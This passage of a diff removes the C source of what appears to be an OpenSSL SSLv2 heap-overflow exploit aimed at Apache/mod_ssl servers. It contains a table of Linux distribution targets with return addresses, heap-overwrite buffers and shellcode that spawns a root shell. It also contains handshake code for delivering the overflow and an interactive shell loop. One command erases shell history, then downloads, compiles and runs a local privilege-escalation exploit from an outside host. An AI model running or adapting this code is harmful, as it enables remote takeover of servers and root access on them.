-		"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
-		0x0809d233
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
-		0x0809f6ef
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.14) 2",
-		0x0809d6c4
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
-		0x0809ccde
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
-		0x0809ce14
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
-		0x0809d262
-	},
-	{
-		"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
-		0x08083545
-	},
-	{
-		"Mandrake Linux 8.0 (apache-1.3.19-3)",
-		0x0809ea98
-	},
-	{
-		"Mandrake Linux 8.1 (apache-1.3.20-3)",
-		0x0809e97c
-	},
-	{
-		"Mandrake Linux 8.2 (apache-1.3.23-4)",
-		0x08086580
-	},
-	{       "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
-	        0x08086484
-	},
-	{       "Mandrake Linux 8.2 (apache-1.3.24)",
-	        0x08086665
-	},
-
-	{       "Mandrake Linux 9 (apache-1.3.26)",
-	        0x0808b864
-	},
-	{
-		"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
-		0x0808c0f4
-	},
-	{
-		"RedHat Linux TEST1 (apache-1.3.12-1)",
-		0x0808c0f4
-	},
-	{
-		"RedHat Linux TEST2 (apache-1.3.12-1)",
-		0x0808c0f4
-	},
-	{
-		"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
-		0x080d2c35
-	},
-	{
-		"RedHat Linux 4.2 (apache-1.1.3-3)",
-		0x08065bae
-	},
-	{
-		"RedHat Linux 5.0 (apache-1.2.4-4)",
-		0x0808c82c
-	},
-	{
-		"RedHat Linux 5.1-Update (apache-1.2.6)",
-		0x08092a45
-	},
-	{
-		"RedHat Linux 5.1 (apache-1.2.6-4)",
-		0x08092c2d
-	},
-	{
-		"RedHat Linux 5.2 (apache-1.3.3-1)",
-		0x0806f049
-	},
-	{
-		"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
-		0x0808e4d8
-	},
-	{
-		"RedHat Linux 6.0 (apache-1.3.6-7)",
-		0x080707ec
-	},
-	{
-		"RedHat Linux 6.0 (apache-1.3.6-7)",
-		0x080707f9
-	},
-	{
-		"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
-		0x0808fd52
-	},
-	{
-		"RedHat Linux 6.0 Update (apache-1.3.24)",
-		0x80acd58
-	},
-	{
-		"RedHat Linux 6.1 (apache-1.3.9-4)1",
-		0x0808ccc4
-	},
-	{
-		"RedHat Linux 6.1 (apache-1.3.9-4)2",
-		0x0808ccdc
-	},
-	{
-		"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
-		0x0808fd5d
-	},
-	{
-		"RedHat Linux 6.1-fp2000 (apache-1.3.26)",
-		0x082e6fcd
-	},
-	{
-		"RedHat Linux 6.2 (apache-1.3.12-2)1",
-		0x0808f689
-	},
-	{
-		"RedHat Linux 6.2 (apache-1.3.12-2)2",
-		0x0808f614
-	},
-	{
-		"RedHat Linux 6.2 mod(apache-1.3.12-2)3",
-		0xbffff94c
-	},
-
-	{
-		"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
-		0x0808f9ec
-	},
-	{
-		"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
-		0x0808f9d4
-	},
-	{
-		"Redhat Linux 7.x (apache-1.3.22)",
-		0x0808400c
-	},
-	{
-		"RedHat Linux 7.x (apache-1.3.26-1)",
-		0x080873bc
-	},
-	{       "RedHat Linux 7.x (apache-1.3.27)",
-	        0x08087221
-	},
-	{
-		"RedHat Linux 7.0 (apache-1.3.12-25)1",
-		0x0809251c
-	},
-	{
-		"RedHat Linux 7.0 (apache-1.3.12-25)2",
-		0x0809252d
-	},
-	{
-		"RedHat Linux 7.0 (apache-1.3.14-2)",
-		0x08092b98
-	},
-        {
-		"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
-		0x08084358
-	},
-	{
-		"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
-		0x0808438c
-	},
-	{
-		"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
-		0x08086e41
-	},
-	{
-		"RedHat Linux 7.1 (apache-1.3.19-5)1",
-		0x0809af8c
-	},
-	{
-		"RedHat Linux 7.1 (apache-1.3.19-5)2",
-		0x0809afd9
-	},
-	{
-		"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
-		0x0808438c
-	},
-	{
-		"RedHat Linux 7.1-Update (1.3.22-5.7.1)",
-		0x08084389
-	},
-        {
-		"RedHat Linux 7.1 (apache-1.3.22-src)",
-	        0x0816021c
-        },
-        {
-		"RedHat Linux 7.1-Update (1.3.27-1.7.1)",
-		0x08086ec89
-	},
-	{
-		"RedHat Linux 7.2 (apache-1.3.20-16)1",
-		0x080994e5
-	},
-	{
-		"RedHat Linux 7.2 (apache-1.3.20-16)2",
-		0x080994d4
-	},
-	{
-		"RedHat Linux 7.2-Update (apache-1.3.22-6)",
-		0x08084045
-	},
-	{
-		"RedHat Linux 7.2 (apache-1.3.24)",
-		0x80b0938
-	},
-	{
-		"RedHat Linux 7.2 (apache-1.3.26)",
-		0x08161c16
-	},
-	{
-		"RedHat Linux 7.2 (apache-1.3.26-snc)",
-		0x8161c14
-	},
-	{
-
-		"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
-		0x08269950
-	},
-	{
-		"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
-		0x08269988
-	},
-	{
-		"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
-		0x08086af9
-	},
-	{
-		"RedHat Linux 7.3 (apache-1.3.23-11)1",
-		0x0808528c
-	},
-	{
-		"RedHat Linux 7.3 (apache-1.3.23-11)2",
-		0x0808525f
-	},
-	{
-		"RedHat Linux 7.3 (apache-1.3.27)",
-		0x080862e4
-	},
-	{       "RedHat Linux 8.0 (apache-1.3.27)",
-	        0x08084c1c
-        },
-        {       "RedHat Linux 8.0-second (apache-1.3.27)",
-                0x0808151e
-        },
-	{       "RedHat Linux 8.0 (apache-2.0.40)",
-                0x08092fa4
-        },
-	{
-		"Slackware Linux 4.0 (apache-1.3.6)",
-		0x08088130
-	},
-	{
-		"Slackware Linux 7.0 (apache-1.3.9)",
-		0x080a7fc0
-	},
-	{
-		"Slackware Linux 7.0 (apache-1.3.26)",
-		0x083d37fc
-	},
-        {       "Slackware 7.0  (apache-1.3.26)2",
-		0x083d2232
-	},
-	{
-		"Slackware Linux 7.1 (apache-1.3.12)",
-		0x080a86a4
-	},
-	{
-		"Slackware Linux 8.0 (apache-1.3.20)",
-		0x080ae67c
-	},
-	{
-		"Slackware Linux 8.1 (apache-1.3.24)",
-		0x080b0c60
-	},
-	{
-		"Slackware Linux 8.1 (apache-1.3.26)",
-		0x080b2100
-	},
-
-	{
-		"Slackware Linux 8.1-stable (apache-1.3.26)",
-		0x080b0c60
-	},
-	{       "Slackware Linux (apache-1.3.27)",
-	        0x080b1a3a
-	},
-	{
-		"SuSE Linux 7.0 (apache-1.3.12)",
-		0x0809f54c
-	},
-	{
-		"SuSE Linux 7.1 (apache-1.3.17)",
-		0x08099984
-	},
-	{
-		"SuSE Linux 7.2 (apache-1.3.19)",
-		0x08099ec8
-	},
-	{
-		"SuSE Linux 7.3 (apache-1.3.20)",
-		0x08099da8
-	},
-	{
-		"SuSE Linux 8.0 (apache-1.3.23)",
-		0x08086168
-	},
-	{
-		"SUSE Linux 8.0 (apache-1.3.23-120)",
-		0x080861c8
-	},
-	{
-		"SuSE Linux 8.0 (apache-1.3.23-137)",
-		0x080861c8
-	},
-/* this one unchecked cause require differend shellcode */
-	{
-		"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
-		0xfd42630
-	},
-
-};
-
-extern int errno;
-
-int cipher;
-int ciphers;
-
-/* the offset of the local port from be beginning of the overwrite next chunk buffer */
-#define FINDSCKPORTOFS     208 + 12 + 46
-
-unsigned char overwrite_session_id_length[] =
-	"AAAA"								/* int master key length; */
-	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char master key[SSL MAX MASTER KEY LENGTH];	*/
-	"\x70\x00\x00\x00";					/* unsigned int session id length; */
-
-unsigned char overwrite_next_chunk[] =
-	"AAAA"								/* int master key length; */
-	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char master key[SSL MAX MASTER KEY LENGTH];	*/
-	"AAAA"								/* unsigned int session id length; */
-	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
-	"AAAA"								/* unsigned int sid ctx length; */
-	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"	/* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
-	"AAAA"								/* int not resumable; */
-	"\x00\x00\x00\x00"					/* struct sess cert st *sess cert; */
-	"\x00\x00\x00\x00"					/* X509 *peer; */
-	"AAAA"								/* long verify result; */
-	"\x01\x00\x00\x00"					/* int references; */
-	"AAAA"								/* int timeout; */
-	"AAAA"								/* int time */
-	"AAAA"								/* int compress meth; */
-	"\x00\x00\x00\x00"					/* SSL CIPHER *cipher; */
-	"AAAA"								/* unsigned long cipher id; */
-	"\x00\x00\x00\x00"					/* STACK OF(SSL CIPHER) *ciphers; */
-	"\x00\x00\x00\x00\x00\x00\x00\x00"	/* CRYPTO EX DATA ex data; */
-	"AAAAAAAA"							/* struct ssl session st *prev,*next; */
-
-	"\x00\x00\x00\x00"					/* Size of previous chunk */
-	"\x11\x00\x00\x00"					/* Size of chunk, in bytes */
-	"fdfd"								/* Forward and back pointers */
-	"bkbk"
-	"\x10\x00\x00\x00"					/* Size of previous chunk */
-	"\x10\x00\x00\x00"					/* Size of chunk, PREV INUSE is set */
-
-/* shellcode start */
-    "\xeb\x0a\x90\x90"	/* jump 10 bytes ahead, land at shellcode */
-    "\x90\x90\x90\x90"
-    "\x90\x90\x90\x90"	/* this is overwritten with FD by the unlink macro */
-
-/* 72 bytes findsckcode by LSD-pl */
-    "\x31\xdb"             /* xorl    %ebx,%ebx              */
-    "\x89\xe7"             /* movl    %esp,%edi              */
-    "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
-    "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
-    "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
-    "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
-    "\xb3\x10"             /* movb    $0x10,%bl              */
-    "\x89\x19"             /* movl    %ebx,(%ecx)            */
-    "\x31\xc9"             /* xorl    %ecx,%ecx              */
-    "\xb1\xff"             /* movb    $0xff,%cl              */
-    "\x89\x0f"             /* movl    %ecx,(%edi)            */
-    "\x51"                 /* pushl   %ecx                   */
-    "\x31\xc0"             /* xorl    %eax,%eax              */
-    "\xb0\x66"             /* movb    $0x66,%al              */
-    "\xb3\x07"             /* movb    $0x07,%bl              */
-    "\x89\xf9"             /* movl    %edi,%ecx              */
-    "\xcd\x80"             /* int     $0x80                  */
-    "\x59"                 /* popl    %ecx                   */
-    "\x31\xdb"             /* xorl    %ebx,%ebx              */
-    "\x39\xd8"             /* cmpl    %ebx,%eax              */
-    "\x75\x0a"             /* jne     <findsckcode+54>       */
-    "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx            */
-    "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)          */
-    "\x74\x02"             /* je      <findsckcode+56>       */
-    "\xe2\xe0"             /* loop    <findsckcode+24>       */
-    "\x89\xcb"             /* movl    %ecx,%ebx              */
-    "\x31\xc9"             /* xorl    %ecx,%ecx              */
-    "\xb1\x03"             /* movb    $0x03,%cl              */
-    "\x31\xc0"             /* xorl    %eax,%eax              */
-    "\xb0\x3f"             /* movb    $0x3f,%al              */
-    "\x49"                 /* decl    %ecx                   */
-    "\xcd\x80"             /* int     $0x80                  */
-    "\x41"                 /* incl    %ecx                   */
-    "\xe2\xf6"             /* loop    <findsckcode+62>       */
-
-/* 10 byte setresuid(0,0,0); by core */
-     "\x31\xc9"       /* xor    %ecx,%ecx */
-     "\xf7\xe1"       /* mul    %ecx,%eax */
-     "\x51"           /* push   %ecx */
-     "\x5b"           /* pop    %ebx */
-     "\xb0\xa4"       /* mov    $0xa4,%al */
-     "\xcd\x80"       /* int    $0x80 */
-
-    
-/* bigger shellcode added by spabam */
-
-/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
-        "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
-*/
-
-
-/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
-    "\x31\xc0"             /* xorl    %eax,%eax              */
-    "\x50"                 /* pushl   %eax                   */
-    "\x68""//sh"           /* pushl   $0x68732f2f            */
-    "\x68""/bin"           /* pushl   $0x6e69622f            */
-    "\x89\xe3"             /* movl    %esp,%ebx              */
-    "\x50"                 /* pushl   %eax                   */
-    "\x53"                 /* pushl   %ebx                   */
-    "\x89\xe1"             /* movl    %esp,%ecx              */
-    "\x99"                 /* cdql                           */
-    "\xb0\x0b"             /* movb    $0x0b,%al              */
-    "\xcd\x80";             /* int     $0x80                  */
-
-/* read and write buffer*/
-#define BUFSIZE 16384
-
-/* hardcoded protocol stuff */
-#define CHALLENGE_LENGTH 16
-#define RC4_KEY_LENGTH 16	/* 128 bits */
-#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
-
-/* straight from the openssl source */
-#define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))    )),c+=2)
-#define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
-
-/* we keep all SSL2 state in this structure */
-typedef struct {
-	int sock;
-
-	/* client stuff */
-	unsigned char challenge[CHALLENGE_LENGTH];
-	unsigned char master_key[RC4_KEY_LENGTH];
-	unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
-
-	/* connection id - returned by the server */
-	int conn_id_length;
-	unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
-
-	/* server certificate */
-	X509 *x509;
-
-	/* session keys */
-	unsigned char* read_key;
-	unsigned char* write_key;
-	RC4_KEY* rc4_read_key;
-	RC4_KEY* rc4_write_key;
-
-	/* sequence numbers, used for MAC calculation */
-	int read_seq;
-	int write_seq;
-
-	/* set to 1 when the SSL2 handshake is complete */
-	int encrypted;
-} ssl_conn;
-
-#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
-#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
-
-long getip(char *hostname) {
-	struct hostent *he;
-	long ipaddr;
-	
-	if ((ipaddr = inet_addr(hostname)) < 0) {
-		if ((he = gethostbyname(hostname)) == NULL) {
-			perror("gethostbyname()");
-			exit(-1);
-		}
-		memcpy(&ipaddr, he->h_addr, he->h_length);
-	}	
-	return ipaddr;
-}
-
-/* mixter's code w/enhancements by core */
-
-int sh(int sockfd) {
-   char snd[1024], rcv[1024];
-   fd_set rset;
-   int maxfd, n;
-
-   /* Priming commands */
-   strcpy(snd, COMMAND1 "\n");
-   write(sockfd, snd, strlen(snd));
-
-   strcpy(snd, COMMAND2 "\n");
-   write(sockfd, snd, strlen(snd));
-
-   /* Main command loop */
-   for (;;) {
-      FD_SET(fileno(stdin), &rset);
-      FD_SET(sockfd, &rset);
-
-      maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
-      select(maxfd, &rset, NULL, NULL, NULL);
-
-      if (FD_ISSET(fileno(stdin), &rset)) {
-	 bzero(snd, sizeof(snd));
-	 fgets(snd, sizeof(snd)-2, stdin);
-	 write(sockfd, snd, strlen(snd));
-      }
-
-      if (FD_ISSET(sockfd, &rset)) {
-	 bzero(rcv, sizeof(rcv));
-
-	 if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
-	    printf("Good Bye!\n");
-	    return 0;
-	 }
-
-	 if (n < 0) {
-	    perror("read");
-	    return 1;
-	 }
-
-	 fputs(rcv, stdout);
-	 fflush(stdout); /* keeps output nice */
-      }
-   } /* for(;;) */
-}
-
-/* Returns the local port of a connected socket */
-int get_local_port(int sock)
-{
-	struct sockaddr_in s_in;
-	unsigned int namelen = sizeof(s_in);
-
-	if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
-		printf("Can't get local port: %s\n", strerror(errno));
-		exit(1);
-	}
-
-	return s_in.sin_port;
-}
-
-/* Connect to a host */
-int connect_host(char* host, int port)
-{
-	struct sockaddr_in s_in;
-	int sock;
-
-	s_in.sin_family = AF_INET;
-	s_in.sin_addr.s_addr = getip(host);
-	s_in.sin_port = htons(port);
-
-	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
-		printf("Could not create a socket\n");
-		exit(1);
-	}
-
-	if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
-		printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
-		exit(1);
-	}
-
-	return sock;
-}
-
-/* Create a new ssl conn structure and connect to a host */
-ssl_conn* ssl_connect_host(char* host, int port)
-{
-	ssl_conn* ssl;
-
-	if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
-		printf("Can't allocate memory\n");
-		exit(1);
-	}
-
-	/* Initialize some values */
-	ssl->encrypted = 0;
-	ssl->write_seq = 0;
-	ssl->read_seq = 0;
-
-	ssl->sock = connect_host(host, port);
-
-	return ssl;
-}
-
-/* global buffer used by the ssl result() */
-char res_buf[30];
-
-/* converts an SSL error code to a string */
-char* ssl_error(int code) {
-	switch (code) {
-		case 0x00:	return "SSL2 PE UNDEFINED ERROR (0x00)";
-		case 0x01:	return "SSL2 PE NO CIPHER (0x01)";
-		case 0x02:	return "SSL2 PE NO CERTIFICATE (0x02)";
-		case 0x04:	return "SSL2 PE BAD CERTIFICATE (0x03)";
-		case 0x06:	return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
-	default:
-		sprintf(res_buf, "%02x", code);
-		return res_buf;
-	}
-}
-
-/* read len bytes from a socket. boring. */
-int read_data(int sock, unsigned char* buf, int len)
-{
-	int l;
-	int to_read = len;
-
-	do {
-		if ((l = read(sock, buf, to_read)) < 0) {
-			printf("Error in read: %s\n", strerror(errno));
-			exit(1);
-		}
-		to_read -= len;
-	} while (to_read > 0);
-
-	return len;
-}
-
-/* reads an SSL packet and decrypts it if necessery */
-int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
-{
-	int rec_len, padding;
-
-	read_data(ssl->sock, buf, 2);
-
-	if ((buf[0] & 0x80) == 0) {
-		/* three byte header */
-		rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
-		read_data(ssl->sock, &buf[2], 1);
-		padding = (int)buf[2];
-	}
-	else {
-		/* two byte header */
-		rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
-		padding = 0;
-	}
-
-	if ((rec_len <= 0) || (rec_len > buf_size)) {
-		printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); 
-		exit(1);
-	}
-
-	read_data(ssl->sock, buf, rec_len);
-
-	if (ssl->encrypted) {
-		if (MD5_DIGEST_LENGTH + padding >= rec_len) {
-			if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
-				/* the server didn't switch to encryption due to an error */
-				return 0;
-			}
-			else {
-				printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
-				exit(1);
-			}
-		}
-
-		/* decrypt the encrypted part of the packet */
-		RC4(ssl->rc4_read_key, rec_len, buf, buf);
-
-		/* move the decrypted message in the beginning of the buffer */
-		rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
-		memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
-	}
-
-	if (buf[0] == SSL2_MT_ERROR) {
-		if (rec_len != 3) {
-			printf("Malformed server error message\n");
-			exit(1);
-		}
-		else {
-			return 0;
-		}
-	}
-
-	return rec_len;
-}
-
-/* send an ssl packet, encrypting it if ssl->encrypted is set */
-void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
-{
-	unsigned char buf[BUFSIZE];
-	unsigned char* p;
-	int tot_len;
-	MD5_CTX ctx;
-	int seq;
-
-
-	if (ssl->encrypted)
-		tot_len = rec_len + MD5_DIGEST_LENGTH;	/* RC4 needs no padding */
-	else
-		tot_len = rec_len;
-
-	if (2 + tot_len > BUFSIZE) {
-		printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
-		exit(1);
-	}
-
-	p = buf;
-	s2n(tot_len, p);
-
-	buf[0] = buf[0] | 0x80;	/* two byte header */
-
-	if (ssl->encrypted) {
-		/* calculate the MAC */
-		seq = ntohl(ssl->write_seq);
-
-		MD5_Init(&ctx);
-		MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
-		MD5_Update(&ctx, rec, rec_len);
-		MD5_Update(&ctx, &seq, 4);
-		MD5_Final(p, &ctx);
-
-		p+=MD5_DIGEST_LENGTH;
-
-		memcpy(p, rec, rec_len);
-
-		/* encrypt the payload */
-		RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
-
-	}
-	else {
-		memcpy(p, rec, rec_len);
-	}
-
-	send(ssl->sock, buf, 2 + tot_len, 0);
-
-	/* the sequence number is incremented by both encrypted and plaintext packets
-*/
-	ssl->write_seq++;
-}
-
-/* Send a CLIENT HELLO message to the server */
-void send_client_hello(ssl_conn *ssl)
-{
-	int i;
-	unsigned char buf[BUFSIZE] =
-		"\x01"			/* client hello msg */
-
-		"\x00\x02"		/* client version */
-		"\x00\x18"		/* cipher specs length */
-		"\x00\x00"		/* session id length */
-		"\x00\x10"		/* challenge length */
-
-		"\x07\x00\xc0\x05\x00\x80\x03\x00"	/* cipher specs data */
-		"\x80\x01\x00\x80\x08\x00\x80\x06"
-		"\x00\x40\x04\x00\x80\x02\x00\x80"
-
-		"";									/* session id data */
-
-	/* generate CHALLENGE LENGTH bytes of challenge data */
-	for (i = 0; i < CHALLENGE_LENGTH; i++) {
-		ssl->challenge[i] = (unsigned char) (rand() >> 24);
-	}
-	memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
-
-	send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
-}
-
-/* Get a SERVER HELLO response from the server */
-void get_server_hello(ssl_conn* ssl)
-{
-	unsigned char buf[BUFSIZE];
-	unsigned char *p, *end;
-	int len;
-	int server_version, cert_length, cs_length, conn_id_length;
-	int found;
-
-	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
-		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
-		exit(1);
-	}
-	if (len < 11) {
-		printf("get_server_hello: Packet too short (len = %d)\n", len);
-		exit(1);
-	}
-
-	p = buf;
-
-	if (*(p++) != SSL2_MT_SERVER_HELLO) {
-		printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
-		exit(1);
-	}
-
-	if (*(p++) != 0) {
-		printf("get_server_hello: SESSION-ID-HIT is not 0\n");
-		exit(1);
-	}
-
-	if (*(p++) != 1) {
-		printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
-		exit(1);
-	}
-
-	n2s(p, server_version);
-	if (server_version != 2) {
-		printf("get_server_hello: Unsupported server version %d\n", server_version);
-		exit(1);
-	}
-
-	n2s(p, cert_length);
-	n2s(p, cs_length);
-	n2s(p, conn_id_length);
-
-	if (len != 11 + cert_length + cs_length + conn_id_length) {
-		printf("get_server_hello: Malformed packet size\n");
-		exit(1);
-	}
-
-	/* read the server certificate */
-	ssl->x509 = NULL;
-	ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
-	if (ssl->x509 == NULL) {
-		printf("get server hello: Cannot parse x509 certificate\n");
-		exit(1);
-	}
-
-	if (cs_length % 3 != 0) {
-		printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
-		exit(1);
-	}
-
-	found = 0;
-	for (end=p+cs_length; p < end; p += 3) {
-		if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
-			found = 1;	/* SSL CK RC4 128 WITH MD5 */
-	}
-
-	if (!found) {
-		printf("get server hello: Remote server does not support 128 bit RC4\n");
-		exit(1);
-	}
-
-	if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
-		printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
-		exit(1);
-	}
-
-	/* The connection id is sent back to the server in the CLIENT FINISHED packet */
-	ssl->conn_id_length = conn_id_length;
-	memcpy(ssl->conn_id, p, conn_id_length);
-}
-
-/* Send a CLIENT MASTER KEY message to the server */
-
-void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
-	int encrypted_key_length, key_arg_length, record_length;
-	unsigned char* p;
-	int i;
-	EVP_PKEY *pkey=NULL;
-
-	unsigned char buf[BUFSIZE] =
-		"\x02"			/* client master key message */
-		"\x01\x00\x80"	/* cipher kind */
-		"\x00\x00"		/* clear key length */
-		"\x00\x40"		/* encrypted key length */
-		"\x00\x08";		/* key arg length */
-
-	p = &buf[10];
-
-	/* generate a 128 byte master key */
-	for (i = 0; i < RC4_KEY_LENGTH; i++) {
-		ssl->master_key[i] = (unsigned char) (rand() >> 24);
-	}
-
-	pkey=X509_get_pubkey(ssl->x509);
-	if (!pkey) {
-		printf("send client master key: No public key in the server certificate\n");
-		exit(1);
-	}
-
-	if (pkey->type != EVP_PKEY_RSA) {
-		printf("send client master key: The public key in the server certificate is not a RSA key\n");
-		exit(1);
-	}
-
-	/* Encrypt the client master key with the server public key and put it in the packet */
-	encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
-	if (encrypted_key_length <= 0) {
-		printf("send client master key: RSA encryption failure\n");
-		exit(1);
-	}
-
-	p += encrypted_key_length;
-
-	if (key_arg_overwrite) {
-		/* These 8 bytes fill the key arg array on the server */
-		for (i = 0; i < 8; i++) {
-			*(p++) = (unsigned char) (rand() >> 24);
-		}
-		/* This overwrites the data following the key arg array */
-		memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
-
-		key_arg_length = 8 + key_arg_overwrite_len;
-	}
-	else {
-		key_arg_length = 0;	/* RC4 doesn't use KEY-ARG */
-	}
-	p = &buf[6];
-	s2n(encrypted_key_length, p);
-	s2n(key_arg_length, p);
-	record_length = 10 + encrypted_key_length + key_arg_length;
-	send_ssl_packet(ssl, buf, record_length);
-	ssl->encrypted = 1;
-}
-void generate_key_material(ssl_conn* ssl)
-{
-	unsigned int i;
-	MD5_CTX ctx;
-	unsigned char *km;
-	unsigned char c='0';
-
-	km=ssl->key_material;
-	for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
-		MD5_Init(&ctx);
-
-		MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
-		MD5_Update(&ctx,&c,1);
-		c++;
-		MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
-		MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
-		MD5_Final(km,&ctx);
-		km+=MD5_DIGEST_LENGTH;
-	}
-}
-void generate_session_keys(ssl_conn* ssl)
-{
-	generate_key_material(ssl);
-	ssl->read_key = &(ssl->key_material[0]);
-	ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
-	RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
-
-	ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
-	ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
-	RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
-}
-void get_server_verify(ssl_conn* ssl)
-{
-	unsigned char buf[BUFSIZE];
-	int len;
-	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
-		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
-		exit(1);
-	}
-	if (len != 1 + CHALLENGE_LENGTH) {
-		printf("get server verify: Malformed packet size\n");
-		exit(1);
-	}
-	if (buf[0] != SSL2_MT_SERVER_VERIFY) {
-		printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
-		exit(1);
-	}
-	if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
-		printf("get server verify: Challenge strings don't match\n");
-		exit(1);
-	}
-}
-void send_client_finished(ssl_conn* ssl)
-{
-	unsigned char buf[BUFSIZE];
-	buf[0] = SSL2_MT_CLIENT_FINISHED;
-	memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
-	send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
-}
-void get_server_finished(ssl_conn* ssl)
-{
-	unsigned char buf[BUFSIZE];
-	int len;
-	int i;
-	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
-		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
-		exit(1);
-	}
